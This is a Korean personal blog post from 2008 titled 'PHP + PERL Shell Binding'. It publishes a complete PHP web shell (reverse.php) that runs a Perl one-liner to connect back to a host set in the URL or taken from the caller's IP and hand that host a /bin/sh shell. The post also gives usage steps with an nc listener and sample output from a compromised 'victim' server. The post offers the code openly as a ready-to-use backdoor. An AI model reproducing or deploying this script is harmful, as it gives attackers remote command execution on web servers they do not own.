Admin
알라신께충성
by 알라신께충성
Location Logs
Media Logs
Site Tags
Keyword Logs
Guestbook
PHP + PERL Shell Binding
Security
2008/07/23 23:42
posted by 알라신께충성
<?php /* +-----------------------------------+ | PHP + PERL Shell Binding | | By bando | +-----------------------------------+ 1. reverse.php (host default : $_SERVER[REMOTE_ADDR]) >>> http://xxxxxx.com/reverse.php?port=5555 >>> Connected >>> xxx.xxx.xxx.xxx:5555 or >>> http://xxxxxx.com/reverse.php?host=xxx.xxx.xxx.xxx&port=5555 >>> Connected >>> xxx.xxx.xxx.xxx:5555 2. local or remote system [root@bando ~]$ nc -l -p 5555 >>> victim : xxx.xxx.xxx.xxx id uid=48(apache) gid=48(apache) groups=48(apache) */ $host = ($_GET[host]) ? $_GET[host] : $_SERVER[REMOTE_ADDR]; $port = ($_GET[port]) ? $_GET[port] : 31337; $victim = $_SERVER[SERVER_ADDR]; $v0zlt = "perl -e 'use Socket;socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || exit 1;if (!connect(SOCK, pack \"SnA4x8\", 2, $port, inet_aton(\"$host\"))) {exit 1;}if ( !fork() ) {send(SOCK,\">>> victim : $victim\n\",0);open(STDIN,\">&SOCK\");open(STDOUT,\">&SOCK\");open(STDERR,\">&SOCK\");system(\"/bin/sh\");exit(0);}print \"Connected >>> $host:$port\n\"' "; system($v0zlt); ?>
TAG
PERL
,
PHP
,
Security
받은 트랙백이 없고
,
댓글이 없습니다.
Trackbas address ::
http://vozlt.org/trackback/20
: 이름
: 패스워드
: 홈페이지
비밀글
<< prev
1
...
5
6
7
8
9
10
11
12
13
...
26
next >>
Notices
Search
Categories
분류 전체보기
(26)
맨날맨날
(9)
놀이들
(2)
음악들
(0)
사진들
(5)
잡다한
(1)
느낌들
(1)
여행들
(0)
Os
(1)
Linux
(1)
Bsd
(0)
Solraris
(0)
Windows
(0)
Programming
(8)
Php
(0)
Python
(0)
Ruby
(0)
Asm
(1)
Shell
(0)
Java
(0)
C
(5)
C++
(0)
Perl
(2)
Lisp
(0)
R
(0)
Protocol
(4)
Security
(3)
Profile
(1)
Site Tags
C/C++
Protocol
PERL
Security
TCP/IP
NATEONBOT
ASCII
PHP
Assembly
mod_sockopts
recent Entries
2009년 7월 21일 휴가
(4)
[2009/05/20]
[apache] - mod_sockopts
[TCP/IP] - TCP_DEFER_AC..
(1)
[PERL] perl 데몬화 하기..
(1)
recent Comments
정말 감사합니다.
online casinos
08/01
[비밀댓글].
07/13
감사합니다 ^^ 퍼 가겠습니...
Grub
2010
보냈어요~^^.
알라신께충성
2009
[비밀댓글].
2009
recent Trackbacks
JEEN의 생각.
jeen's me2DAY
2008
Archives
2009/07
(1)
2009/05
(1)
2009/03
(3)
2008/12
(1)
2008/08
(2)
Calendar
«
2012/02
»
일
월
화
수
목
금
토
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Links
GNU 매뉴얼 한국어.
KLDP.
Rapid Library.
[BLOG] 장엔지니어 님.
[BLOG] Tetris 님.
[BLOG] Degul 님.
[BLOG] Somma 님.
[BLOG] Oops 님.
Total : 57,642
Today : 51
Yesterday : 49